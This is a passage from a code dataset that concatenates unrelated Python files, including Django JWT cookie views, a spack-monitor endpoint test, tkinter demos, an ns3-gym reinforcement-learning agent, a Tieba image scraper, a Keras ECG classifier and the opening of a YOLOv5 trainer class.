import HttpResponse\n\n\nclass CustomTokenObtainPairView(TokenObtainPairView):\n def post(self, request, *args, **kwargs):\n \"\"\"\n setting up two cookies: access and httponly refresh\n formatting response body\n \"\"\"\n response = super().post(request, *args, **kwargs)\n\n response.set_cookie(\n key='access',\n value=response.data['access'],\n expires=settings.SIMPLE_JWT['ACCESS_TOKEN_LIFETIME'],\n secure=settings.SIMPLE_JWT['AUTH_COOKIE_SECURE'],\n httponly=False,\n samesite=settings.SIMPLE_JWT['AUTH_COOKIE_SAMESITE'],\n )\n\n response.set_cookie(\n key='refresh',\n value=response.data['refresh'],\n expires=settings.SIMPLE_JWT['ACCESS_TOKEN_LIFETIME'],\n secure=settings.SIMPLE_JWT['AUTH_COOKIE_SECURE'],\n httponly=settings.SIMPLE_JWT['AUTH_COOKIE_HTTP_ONLY'],\n samesite=settings.SIMPLE_JWT['AUTH_COOKIE_SAMESITE'],\n path=reverse('refresh')\n )\n\n response.data = {'access': response.data['access']}\n\n return response\n\n\nclass CustomTokenRefreshView(TokenRefreshView):\n def post(self, request, *args, **kwargs):\n if 'refresh' not in request.COOKIES:\n return Response({'refresh': 'The token has not been sent'}, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = self.get_serializer(data={'refresh': request.COOKIES['refresh']})\n\n try:\n serializer.is_valid(raise_exception=True)\n except TokenError as e:\n raise InvalidToken(e.args[0])\n\n response = Response(serializer.validated_data, status=status.HTTP_200_OK)\n\n response.set_cookie(\n key='access',\n value=serializer.validated_data['access'],\n expires=settings.SIMPLE_JWT['ACCESS_TOKEN_LIFETIME'],\n secure=settings.SIMPLE_JWT['AUTH_COOKIE_SECURE'],\n httponly=False,\n samesite=settings.SIMPLE_JWT['AUTH_COOKIE_SAMESITE']\n )\n\n return response\n\n\nclass LogoutView(APIView):\n def post(self, request):\n response = Response(status=status.HTTP_200_OK)\n\n response.delete_cookie('access',\n samesite=settings.SIMPLE_JWT['AUTH_COOKIE_SAMESITE'])\n response.delete_cookie('refresh',\n samesite=settings.SIMPLE_JWT['AUTH_COOKIE_SAMESITE'],\n path='/api/token/refresh/')\n\n return response\n","repo_name":"k0rog/GGAEKAPP-backend","sub_path":"tokens/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37144366707","text":"\"\"\"\ntest spackmon specs endpoints\n\"\"\"\n\nfrom spackmon.apps.main.models import Spec, Dependency\nfrom spackmon.apps.users.models import User\nfrom django.test import TestCase\n\nimport os\nimport sys\n\n# Add spackmoncli to the path\nbase = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nspackmon_dir = os.path.join(base, \"script\")\nspecs_dir = os.path.join(base, \"specs\")\nsys.path.insert(0, spackmon_dir)\n\n\ntry:\n from spackmoncli import read_json, parse_auth_header, get_basic_auth\nexcept ImportError:\n sys.exit(\n \"Cannot import functions from spackmoncli, \"\n \" make sure script folder is added to Python path.\"\n )\n\n\nclass SimpleTest(TestCase):\n def setUp(self):\n self.password = \"bigd\"\n self.user = User.objects.create_user(\n username=\"dinosaur\", email=\"dinosaur@dinosaur.com\", password=self.password\n )\n\n def test_new_spec(self):\n \"\"\"Test the new spec endpoint. This also tests the auth workflow\"\"\"\n\n print(\"Testing NewSpec endpoint /ms1/specs/new/\")\n spec_file = os.path.join(specs_dir, \"singularity-3.8.0.json\")\n spec = read_json(spec_file)\n\n # First attempt without user token should fail\n response = self.client.post(\n \"/ms1/specs/new/\", data={\"spec\": spec[\"spec\"], \"spack_version\": \"1.0.0\"}\n )\n assert response.status_code == 401\n\n # And provide a www-authenticate header\n assert \"www-authenticate\" in response.headers\n h = parse_auth_header(response.headers[\"www-authenticate\"])\n\n assert h.Realm == \"http://testserver/auth/token/\"\n assert h.Scope == \"build\"\n assert h.Service == \"http://testserver\"\n\n # Prepare request to retry\n headers = {\n \"service\": h.Service,\n \"Accept\": \"application/json\",\n \"User-Agent\": \"spackmoncli\",\n \"HTTP_AUTHORIZATION\": \"Basic %s\"\n % get_basic_auth(self.user.username, self.user.token),\n }\n\n auth_response = self.client.get(h.Realm, **headers)\n\n assert auth_response.status_code == 200\n\n # Request the token\n info = auth_response.json()\n token = info.get(\"token\")\n assert token\n\n # Update authorization headers\n headers[\"HTTP_AUTHORIZATION\"] = \"Bearer %s\" % token\n\n # Make sure we have no specs\n assert Spec.objects.count() == 0\n\n # Retry the request with auth headers\n response = self.client.post(\n \"/ms1/specs/new/\",\n data={\"spec\": spec[\"spec\"], \"spack_version\": \"1.0.0\"},\n content_type=\"application/json\",\n **headers\n )\n\n # Was created response is 201\n assert response.status_code == 201\n data = response.json()\n\n # Check the format of the response\n assert data.get(\"message\") == \"success\"\n assert data.get(\"code\") == 201\n\n data = data.get(\"data\")\n assert data.get(\"created\") == True\n\n # The spec is a field of the data\n data = data.get(\"spec\")\n assert data\n\n # Check the response object\n assert data.get(\"full_hash\") == \"36u22fm5i3w2tqyiyje22j6x55emekjw\"\n assert data.get(\"name\") == \"singularity\"\n assert data.get(\"version\") == \"3.8.0\"\n assert data.get(\"spack_version\") == \"1.0.0\"\n\n specs = data.get(\"specs\")\n assert specs\n\n # We should have created one spec\n singularity = Spec.objects.get(full_hash=data.get(\"full_hash\"))\n\n # The list of depdencies should match what is created\n assert singularity.dependencies.count() == len(specs)\n for dep in singularity.dependencies.all():\n assert dep.spec.full_hash in list(specs.values())\n\n # We should be able to retrieve specs by\n hashes = set()\n hashes.add(data.get(\"full_hash\"))\n for spec_name, spec_hash in specs.items():\n spec_obj = Spec.objects.get(full_hash=spec_hash)\n hashes.add(spec_hash)\n\n # Get all spec hashes to compare against top level\n created_hashes = set(Spec.objects.all().values_list(\"full_hash\", flat=True))\n dependency_hashes = created_hashes.difference(hashes)\n\n # A second response should indicate it already exists (200)\n response = self.client.post(\n \"/ms1/specs/new/\",\n data={\"spec\": spec[\"spec\"], \"spack_version\": \"1.0.0\"},\n content_type=\"application/json\",\n **headers\n )\n assert response.status_code == 200\n","repo_name":"spack/spack-monitor","sub_path":"tests/test_specs.py","file_name":"test_specs.py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"34759259379","text":"from tkinter import *\n\ndef left(x):\n x = -10\n y = 0\n c.move(rec, x, y)\n\ndef right(x):\n x = 10\n y = 0\n c.move(rec, x, y)\n \ndef up(x):\n x = 0\n y = -10\n c.move(rec, x, y)\n \ndef down(x):\n x = 0\n y = 10\n c.move(rec, x, y)\n\n\nwindow = Tk()\nwindow.title(\"arrow input\")\nwindow.geometry(\"600x500\")\n\n\nc = Canvas(window, width = 600, height = 500, bg = 'blue')\nc.pack()\n\nrec = c.create_rectangle(20,20,40,40, fill = \"red\", outline = \"black\")\n\n\nwindow.bind(\"<Left>\", left)\nwindow.bind(\"<Right>\", right)\nwindow.bind(\"<Up>\", up)\nwindow.bind(\"<Down>\", down)\n\nwindow.mainloop()","repo_name":"abdullahmohamedali/memory-game","sub_path":"applicatoin/python/coupied/TEST.py","file_name":"TEST.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"73167891452","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport csv\nimport gym\nimport numpy as np\nimport sys\n# Add the directory containing the RL algorithms to your path\n#sys.path.insert(1, '<PATH TO RL FOLDER>/rl') # Relative import\nfrom DQN import KerasDQN\nimport matplotlib.pyplot as plt\nimport argparse\nfrom ns3gym import ns3env\n\nfrom ActorCritic import ActorCritic \nfrom PPO import PPO\n\n# --------------------> Save data to csv <--------------------\nsave = True\n\n# --------------------> Initialize environment <--------------------\nparser = argparse.ArgumentParser(description='Start simulation script on/off')\nparser.add_argument('--start',\n type=int,\n default=0,\n help='Start ns-3 simulation script 0/1, Default: 0') # Use 0 if running simulation in different terminal\nparser.add_argument('--iterations',\n type=int,\n default=1,\n help='Number of iterations, Default: 1')\n\nargs = parser.parse_args()\nstartSim = bool(args.start)\niterationNum = int(args.iterations)\niterationNum = 1\n\nport = 5555\nsimTime = 1e4 # seconds\nstepTime = 1 # seconds\nseed = 0\nsimArgs = {\"--simTime\": simTime,\n \"--stepTime\": stepTime,\n \"--testArg\": 123}\ndebug = False\n\nenv = ns3env.Ns3Env(port=port, stepTime=stepTime, startSim=startSim, simSeed=seed, simArgs=simArgs, debug=debug) \n#env = ns3env.Ns3Env() # To run with one terminal\n\nobservation_space = env.observation_space\naction_space = env.action_space\nn_observations = observation_space.shape[0]\n\n# -----------------------> Set up parameters <--------------------------\n# Number of actions for RL model. Don't include the -1 action in the count \n# -1 is passed to by ns3-gym to indicate the RL is not to be used on this step.\nn_actions = 3\nn_agents = 3\n\n# n_inputs = Distance to all other receivers, sinr, interfence-caused, # successful transmissions, tx power, \n# interference-sensed, and buffer size. \nn_inputs = n_agents + 6 \n\nmax_distance = 50 # For normalization\n# -----------------------> End set up parameters <--------------------------\n\n# --------------------> Create Agents <--------------------\n# DQN\nagents = [KerasDQN(n_inputs, n_actions, \n hidden_layer_one_dims=128, \n hidden_layer_two_dims=256,\n batch_size=64,\n epsilon_min=0.05) for _ in range(n_agents)]\n\n# Actor Critic\n\"\"\"\nagents = [ActorCritic(n_inputs, n_actions) for _ in range(n_agents)]\n\"\"\"\n\n\"\"\"\n# PPO\nagents = [PPO(n_inputs, n_actions, training_schedule=10) for _ in range(n_agents)]\n\"\"\"\n# --------------------> End Create Agents <--------------------\n\ndef distance(x1, y1, x2, y2):\n \"\"\" Returns the 2D Euclidean distance between two points. \"\"\" \n return np.sqrt((x1 - x2)**2 + (y1 - y2)**2)\n\ndef state_to_observations(state):\n \"\"\"\n Positions are [Rx0_x, Rx0_y, Tx1_x, Tx1_y, ...], where the number is the node id. Trasmitter i communicates with \n receiver (i - 1).\n \"\"\"\n positions = state[:4*n_agents]\n other_obs = state[4*n_agents:]\n other_obs_per_agent = len(other_obs) // n_agents\n\n agent_states_list = []\n for i in range(n_agents):\n agent_state = []\n \n # Get distances from transmitter to receivers\n for j in range(len(positions) // 4):\n transmitter_id = 4*i + 2 # id of x-position of transmitter i in positions list; y-position is next element.\n receiver_id = 4*j # id of x-position of receiver j in positions list; y-position is next element.\n transmitter_x = positions[transmitter_id]\n transmitter_y = positions[transmitter_id + 1]\n receiver_x = positions[receiver_id]\n receiver_y = positions[receiver_id + 1]\n tx_to_rx_distance = distance(transmitter_x, transmitter_y, receiver_x, receiver_y)\n agent_state.append(tx_to_rx_distance / max_distance)\n\n obs_idx = i*other_obs_per_agent\n agent_state += other_obs[obs_idx: obs_idx + other_obs_per_agent] \n\n agent_state = np.array(agent_state).reshape(1, -1) \n agent_states_list.append(agent_state)\n\n return agent_states_list\n\n\ndef info_string_parser(info):\n \"\"\"\n Converts a sting of comma separated values to a list of floats\n Input:\n - info (string): comma separated values\n Returns:\n - A list of floats\n \"\"\"\n return [float(x) for x in info.split(',')]\n\n# --------------------> Main loop <--------------------\ncurrIt = 0\ntry:\n while True:\n stepIdx = 0\n rewards = []\n action_list = []\n states = []\n scores = [[] for _ in range(n_agents)]\n rewards = [] \n\n state = env.reset()\n state = [np.zeros(n_inputs).reshape(1, -1) for _ in range(n_agents)]\n \n while True:\n actions = []\n action_probs = []\n for i in range(n_agents):\n # If the buffer is zero, don't use RL\n if state[i][0][-1] == 0:\n actions.append(-1)\n action_probs.append(-1)\n else:\n action = agents[i].choose_action(state[i]) \n actions.append(action)\n\n next_state, reward, done, info = env.step(actions)\n next_state = state_to_observations(next_state)\n\n info_list = info_string_parser(info)\n\n for i in range(n_agents):\n agent_action = actions[i]\n if agent_action == -1: # RL agent not invoked. Do not save transition to memory\n print(\"RL not used\")\n continue\n agent_state = state[i]\n agent_next_state = next_state[i]\n agent_reward = info_list[i]\n agents[i].remember(agent_state, agent_action, agent_reward, agent_next_state, done) \n\n agents[i].learn()\n \n for i in range(n_agents):\n scores[i].append(info_list[i])\n\n rewards.append(info_list)\n action_list.append(actions)\n states.append(state)\n\n state = next_state\n \n stepIdx += 1\n if stepIdx % 100 == 0:\n print(\"Step: \", stepIdx)\n for i in range(n_agents):\n print(\"mean (last 100)\", np.mean(scores[i][-100:]))\n if i == (n_agents - 1):\n print()\n\n if done:\n # Record data in CSV\n if save == True:\n data = [list(reward) + list(action) + list(np.array(state).flatten()) for reward, action, state in zip(rewards, action_list, states)]\n with open(\"data\" + \".csv\", \"w\", newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerows(data)\n break\n\n currIt += 1\n if currIt == iterationNum:\n break\n\nexcept KeyboardInterrupt:\n print(\"Ctrl-C -> Exit\")\n \nfinally:\n env.close()\n print(\"RL Done\")\n","repo_name":"anujagann/MR-iNet","sub_path":"example_scenario/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":7047,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"37631154492","text":"import re\n\nimport requests\nfrom lxml import etree\nimport json\n\n\"\"\"\n爬取某个贴吧里的所有帖子,和帖子中图片\n\n思路:\n1. 准备URL,https://tieba.baidu.com/f?kw=吧名&mo_device=1&pn=0&\n2. 发送请求, 获取响应数据\n3. 解析数据, 提取需要数据\n4. 保存数据\n\n列表页的分页\nURL规律:\n第1页: https://tieba.baidu.com/f?kw=%E6%9D%8E%E5%86%B0%E5%86%B0&mo_device=1&pn=0&\n第2页: https://tieba.baidu.com/f?kw=%E6%9D%8E%E5%86%B0%E5%86%B0&mo_device=1&pn=50&\n第3页: https://tieba.baidu.com/f?kw=%E6%9D%8E%E5%86%B0%E5%86%B0&mo_device=1&pn=100&\n\"\"\"\n\n\nclass TiebaSpider(object):\n def __init__(self):\n self.name = '图拉丁'\n self.url = 'https://tieba.baidu.com/f?kw='+self.name+'&pn={}&'\n # 请求头\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'\n }\n # 贴吧域名(用于补全URL)\n self.tieba_url = 'https://tieba.baidu.com'\n\n def run(self):\n next_url = self.url\n while next_url:\n html = self.get_html(next_url)\n data_list,next_url = self.get_data(html)\n self.save_data(data_list)\n\n def get_html(self, url):\n \"\"\"发送请求,得到数据\"\"\"\n html = requests.get(url=url,headers=self.headers)\n # print(test.content.decode())\n return html.content.decode()\n\n def get_data(self, html):\n \"\"\"解析内容\"\"\"\n element = etree.HTML(html)\n li_list = element.xpath('//li[@class=\"tl_shadow tl_shadow_new\"]')\n # print(len(li_list))\n data_list = []\n for li in li_list:\n item = {}\n item['title'] = li.xpath('./a/div[@class=\"ti_title\"]/span/text()')\n item['detail_url'] = self.tieba_url + li.xpath('./a/@href')[0]\n item['imgs'] = self.get_imgs(item['detail_url'])\n # print(item)\n data_list.append(item)\n\n # 从html源码中提取\"page_size\":一页多少条\n page_size = int(re.findall('\"page_size\":(\\d+)',html)[0])\n # 从html源码中提取\"current_page\":当前页号\n current_page = int(re.findall('\"current_page\":(\\d+)',html)[0])\n # 从html源码中提取\"total_page\":总页数\n total_page = int(re.findall('\"total_page\":(\\d+)',html)[0])\n # 如果有下一页,就生成下一页URL\n if current_page < total_page:\n next_url = self.url.format(current_page * page_size)\n else:\n next_url = None\n print(next_url)\n return data_list,next_url\n\n\n def save_data(self, data_list):\n file_name = \"./test/{}.txt\".format(self.name)\n with open(file_name,'a',encoding='utf-8') as f:\n for data in data_list:\n json.dump(data,f,ensure_ascii=False)\n f.write('\\n')\n\n def get_imgs(self, detail_url):\n\n # print(detail_url_pattern)\n\n while True:\n detail_url_pattern = detail_url + '&pn={}'\n imgs = []\n # 发送数据,获取每个贴的响应数据\n detail_page = self.get_html(detail_url)\n # 每个贴的响应对象\n element = etree.HTML(detail_page)\n # print(element)\n # 每个贴的图片\n img_urls = element.xpath('//div[@data-class=\"BDE_Image\"]/@data-url')\n # print(img_urls)\n # 解码变高清大图\n for img_url in img_urls:\n img_url = requests.utils.unquote(img_url)\n img_url = img_url.split('src=')[1]\n imgs.append(img_url)\n page_sizes = re.findall('\"page_size\":(\\d+)', detail_page)\n\n # 从html源码中提取\"page_size\":一页多少条\n page_size = int(page_sizes[0])\n # 从html源码中提取\"current_page\":当前页号\n current_page = int(re.findall('\"current_page\":(\\d+)', detail_page)[0])\n # 从html源码中提取\"total_page\":总页数\n total_page = int(re.findall('\"total_page\":(\\d+)', detail_page)[0])\n # 如果有下一页,就生成下一页URL\n if current_page < total_page:\n detail_url = detail_url_pattern.format(current_page * page_size)\n else:\n break\n print(imgs)\n return imgs\n\n\nif __name__ == '__main__':\n spider = TiebaSpider()\n spider.run()\n","repo_name":"chainrain/pachong","sub_path":"day04 06.贴吧爬虫的提取详情页图片url.py","file_name":"day04 06.贴吧爬虫的提取详情页图片url.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35791667930","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cms', '0014_auto_20160404_1908'),\n ('djangocms_repeater', '0028_remove_boardmember_image'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='boardmember',\n name='cmsplugin_ptr',\n ),\n migrations.DeleteModel(\n name='BoardMember',\n ),\n ]\n","repo_name":"womenhackfornonprofits/seo-london","sub_path":"djangocms_repeater/migrations/0029_auto_20161121_2235.py","file_name":"0029_auto_20161121_2235.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"3250439336","text":"from keras.layers import Dense, Dropout, Conv2D, Input, MaxPool2D, Flatten\nfrom keras.models import Model\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers import ELU\n\n\n\ndef proposed_model(input_h=128, input_w=128):\n input_shape = (input_h, input_w, 3)\n\n nb_classes = 8\n inputs = Input(input_shape)\n\n # layer 1\n x = Conv2D(64, (3, 3), strides=(1, 1), kernel_initializer='glorot_uniform')(inputs)\n x = ELU()(x)\n x = BatchNormalization()(x)\n\n # layer 2\n x = Conv2D(64, (3, 3), strides=(1, 1), kernel_initializer='glorot_uniform')(x)\n x = ELU()(x)\n x = BatchNormalization()(x)\n\n # layer3\n x = MaxPool2D(pool_size=(2, 2), strides=(2, 2))(x)\n\n # layer4\n x = Conv2D(128, (3, 3), strides=(1, 1), kernel_initializer='glorot_uniform')(x)\n x = ELU()(x)\n x = BatchNormalization()(x)\n\n # layer5\n x = Conv2D(128, (3, 3), strides=(1, 1), kernel_initializer='glorot_uniform')(x)\n x = ELU()(x)\n x = BatchNormalization()(x)\n\n # layer6\n x = MaxPool2D(pool_size=(2, 2), strides=(2, 2))(x)\n\n # layer7\n x = Conv2D(256, (3, 3), strides=(1, 1), kernel_initializer='glorot_uniform')(x)\n x = ELU()(x)\n x = BatchNormalization()(x)\n\n # layer 8\n x = Conv2D(256, (3, 3), strides=(1, 1), kernel_initializer='glorot_uniform')(x)\n x = ELU()(x)\n x = BatchNormalization()(x)\n\n # layer 9\n x = MaxPool2D(pool_size=(2, 2), strides=(2, 2))(x)\n\n x = Flatten()(x)\n\n # layer 10\n x = Dense(2048)(x)\n x = ELU()(x)\n x = BatchNormalization()(x)\n x = Dropout(0.5)(x)\n x = Dense(nb_classes, activation='softmax')(x)\n\n model = Model(inputs, x)\n return model","repo_name":"chingchan1996/ECG-Arrhythmia-Classification-in-2D-CNN","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"78"} +{"seq_id":"23087265986","text":"#ATENCAO VALERIUM NAO VEJA AS LINHAS DE CODIGO, APENAS EXECUTE DEPOIS VOCE VE!!!!!!!\n\n\n\n\n#LEIA ACIMA\n\n\n\n\n\n\n\n#LEIA ACIMA\n\n\n\n\n\n\n\n#LEIA ACIMA\n\n\n\n\n\n\n\n#LEIA ACIMA\n\n\n\n\n#VOLTE E LEIA A 1º LINHA\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nmensagem3 = \"É simples porém de coração\"\n\nage = 18\n\nidade = \"_anos\"\n\nmensagem = \"Feliz_aniversário\"\n\nPara_Vittorio = str(mensagem) + \"_de_\" + str(age) + str(idade) + \"!\"\n\ntitulo = \"Para Vittorio de Ricardo\"\n\nmensagem2 = \"Obrigado por ser a pessoa que você é.\"\n\nmensagem_final = str(Para_Vittorio) + '\\n' + str(mensagem2)\n\nTotal = str(titulo) + '\\n' + str(mensagem_final) + '\\n' + str(mensagem3)\n\nprint(Total)\n\n\n","repo_name":"Haiz3n/aula-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"18741202392","text":"'''\r\n오르막 수는 수의 자리가 오름차순을 이루는 수를 말한다. 이 때, 인접한 수가 같아도 오름차순으로 친다.\r\n\r\n예를 들어, 2234와 3678, 11119는 오르막 수이지만, 2232, 3676, 91111은 오르막 수가 아니다.\r\n\r\n수의 길이 N이 주어졌을 때, 오르막 수의 개수를 구하는 프로그램을 작성하시오. 수는 0으로 시작할 수 있다.\r\n'''\r\n\r\nn = 2\r\n\r\ncache = [[1 for i in range(10)] for _ in range(n+1)]\r\n\r\nfor i in range(2, n+1):\r\n for j in range(10):\r\n cache[i][j] = 0\r\n for k in range(0, j+1):\r\n cache[i][j] += cache[i-1][k]\r\n\r\nprint(sum(cache[-1]))","repo_name":"SungGV/algorithmPractice","sub_path":"algorithms/Dynamic_Programming/incrementing_num.py","file_name":"incrementing_num.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43779803226","text":"from tkinter import *\nimport random\n\nclass Ejercicio:\n def __init__(self):\n self.root = Tk()\n self.canvas1 = Canvas(self.root, width=800, height=600, background=\"black\")\n self.canvas1.tag_bind(\"cuadrado\", \"<ButtonPress-1>\",self.presion_boton)# # se presiona el boton derecho del mouse\n self.canvas1.tag_bind(\"cuadrado\", \"<Button1-Motion>\",self.moviendo) # envia información cuando se pmantiene presionado el boton y se mueve\n self.canvas1.grid(column=0, row=0)\n for i in range(101): # se crean 100 cuadros\n x1 = random.randint(0,800) \n y1 = random.randint(0,600)\n \n self.canvas1.create_rectangle(x1,y1,x1+20,y1+20 , fill=\"red\",tags = \"cuadrado\")\n self.cuadrado_moviendo = None # se dice que no se mueven los cuadros\n\n self.root.mainloop()\n def presion_boton(self,evento): # se recibe si se estta presionando un cuadrado (evento)\n cuadrado = self.canvas1.find_withtag(CURRENT) # busca el cuadrado actual presionado\n self.cuadrado_moviendo = (cuadrado, evento.x, evento.y) #se indica que el cuadrado actual es el que esta en movimiento\n def moviendo(self,evento):\n x, y = evento.x, evento.y # se define variable x | y\n cuadrado, x1, y1 = self.cuadrado_moviendo # se guardan las coordenadas del cuadro en su posición previa\n self.canvas1.move(cuadrado, x-x1, y- y1) # se pasan las coordenadas para mover el cuadro\n self.cuadrado_moviendo=(cuadrado, x, y) # se guardan las nuevas coordenadas del ultimo movimiento del cuadrado\n \n\n \n \n \n\nejercicio1 = Ejercicio()","repo_name":"onavarrete04/Aprendiendo-python","sub_path":"ejercicio_GUI_canvas_moveimage2.py","file_name":"ejercicio_GUI_canvas_moveimage2.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74376556092","text":"r\"\"\"\nFor training model.\nConsist of some Trainers.\n\"\"\"\n\nimport torch\nimport argparse\nimport torch.nn as nn\n\nfrom pathlib import Path\nfrom torch.cuda.amp import GradScaler\nfrom torch.optim.swa_utils import AveragedModel\nfrom warmup_scheduler_pytorch import WarmUpScheduler\n\nfrom visual.utils import WRITER\nfrom visual.utils.log import add_log_file, logging_start_finish, logging_initialize, LOGGER\nfrom visual.utils.loss import LossDetectYolov5\nfrom visual.utils.metrics import compute_fitness\nfrom visual.models.yolov5.yolov5_v6 import yolov5s_v6\nfrom visual.metaclass.metatrainer import MetaTrainDetect\nfrom visual.utils.optimizers import select_optimizer\nfrom visual.utils.lr_schedulers import select_lr_scheduler\nfrom visual.utils.datasets import get_and_check_datasets_yaml, DatasetDetect\nfrom visual.utils.general import timer, load_all_yaml, save_all_yaml, init_seed, select_one_device, loss_to_mean\n\nfrom val_detect import ValDetect\n\nr\"\"\"Set Global Constant for file save and load\"\"\"\nROOT = Path.cwd() # **/visual-framework root directory\n\n\nclass _Args(object):\n def __init__(self, args):\n self.hyp = args.hyp\n self.inc = args.inc\n self.swa_c = args.swa_c\n self.device = args.device\n self.epochs = args.epochs\n self.weights = args.weights\n self.augment = args.augment\n self.workers = args.workers\n self.shuffle = args.shuffle\n self.datasets = args.datasets\n self.save_name = args.save_name\n self.save_path = args.save_path\n self.image_size = args.image_size\n self.batch_size = args.batch_size\n self.pin_memory = args.pin_memory\n self.tensorboard = args.tensorboard\n self.freeze_names = args.freeze_names\n self.visual_image = args.visual_image\n self.visual_graph = args.visual_graph\n self.data_augment = args.data_augment\n self.swa_start_epoch = args.swa_start_epoch\n self.model_state_dict = args.model_state_dict\n\n # Set load way\n self._load_model = args.load_model\n self._load_swa_model = args.load_swa_model\n self._load_optimizer = args.load_optimizer\n self._load_gradscaler = args.load_gradscaler\n self._load_start_epoch = args.load_start_epoch\n self._load_best_fitness = args.load_best_fitness\n self._load_lr_scheduler = args.load_lr_scheduler\n self._load_warmup_lr_scheduler = args.load_warmup_lr_scheduler\n\n\nclass TrainDetect(_Args, MetaTrainDetect):\n r\"\"\"Trainer for detection, built by mixins\"\"\"\n\n @logging_initialize('trainer')\n def __init__(self, args):\n super(TrainDetect, self).__init__(args)\n # TODO design a way to get all parameters in train setting for research if possible\n\n # Get path_dict\n self.path_dict = self.set_save_path(('hyp', 'hyp.yaml'), ('logger', 'logger.log'), ('writer', 'tensorboard'),\n ('args', 'args.yaml'), ('datasets', 'datasets.yaml'),\n ('last', 'weights/last.pt'), ('best', 'weights/best.pt'),\n ('json_gt_val', 'json_gt_val.json'), ('json_gt_test', 'json_gt_test.json'),\n ('json_dt', 'json_dt.json'), ('coco_results', 'coco_results.json'))\n\n # Add FileHandler for logger\n add_log_file(self.path_dict['logger'])\n\n # Set tensorboard writer\n self.writer = self.set_tensorboard_writer(self.path_dict['writer'])\n\n # Set one device\n self.cuda = (self.device != 'cpu')\n self.device = select_one_device(self.device) # requires (model, images, labels).to(self.device)\n\n # Get datasets path dict\n self.datasets = get_and_check_datasets_yaml(self.datasets)\n\n # Load hyp yaml\n self.hyp = load_all_yaml(self.hyp)\n\n # Initialize or auto seed manual and save in self.hyp\n self.hyp['seed'] = init_seed(self.hyp['seed'], self.hyp['deterministic'])\n\n # scale loss\n nl = int(len(self.datasets['anchors']))\n self.hyp['bbox'] *= 3 / nl\n self.hyp['cls'] *= self.datasets['nc'] / 80 * 3. / nl\n self.hyp['obj'] *= (self.image_size / 640) ** 2 * 3. / nl\n\n # Save yaml dict\n save_all_yaml(\n (self.hyp, self.path_dict['hyp']),\n (vars(args), self.path_dict['args']),\n (self.datasets, self.path_dict['datasets'])\n )\n args = self.release_attr()\n\n # TODO auto compute anchors when anchors is None in self.datasets\n\n # Load checkpoint\n self.checkpoint = self.load_checkpoint(self.weights)\n\n # TODO upgrade DP DDP\n\n # Initialize or load model\n self.model = self.load_model(\n yolov5s_v6(self.inc, self.datasets['nc'], self.datasets['anchors'], self.image_size),\n **self._load_model\n )\n\n # Initialize or load swa_model\n self.swa_model = self.load_swa_model(AveragedModel(self.model, self.device), **self._load_swa_model)\n\n # Unfreeze model\n self.unfreeze_model()\n\n # Freeze layers of model\n self.freeze_layers(self.freeze_names)\n\n # Set parameter groups list to for the optimizer\n param_groups = self.set_param_groups(\n (('bias', nn.Parameter, {}),\n ('weight', nn.BatchNorm2d, {}),\n ('weight', nn.Parameter, {'weight_decay': self.hyp['weight_decay']}))\n )\n\n # Initialize and load optimizer\n self.optimizer = self.load_state_dict(\n select_optimizer(param_groups, self.hyp['optimizer'], self.hyp['optimizer_kwargs']),\n **self._load_optimizer\n )\n\n param_groups = self.release_attr()\n\n # Initialize and load lr_scheduler\n self.lr_scheduler = self.load_state_dict(\n select_lr_scheduler(self.optimizer, self.hyp['lr_scheduler'], self.hyp['lr_scheduler_kwargs']),\n **self._load_lr_scheduler\n )\n\n # Initialize and load GradScaler\n self.scaler = self.load_state_dict(GradScaler(enabled=self.cuda), **self._load_gradscaler)\n\n # Initialize or load start_epoch\n self.start_epoch = self.load_start_epoch(**self._load_start_epoch)\n\n # Initialize or load best_fitness\n self.best_fitness = self.load_best_fitness(**self._load_best_fitness)\n\n # Release self.checkpoint when load finished\n self.checkpoint = self.release_attr()\n\n # Get loss function\n self.loss_fn = LossDetectYolov5(self.model, self.hyp)\n\n # Set coco json path dict\n self.coco_json = {\n 'dt': self.path_dict['json_dt'],\n 'val': self.path_dict['json_gt_val'],\n 'test': self.path_dict['json_gt_test'] if self.datasets['test'] else self.path_dict['json_gt_val']\n }\n\n # Get dataloader for training validating 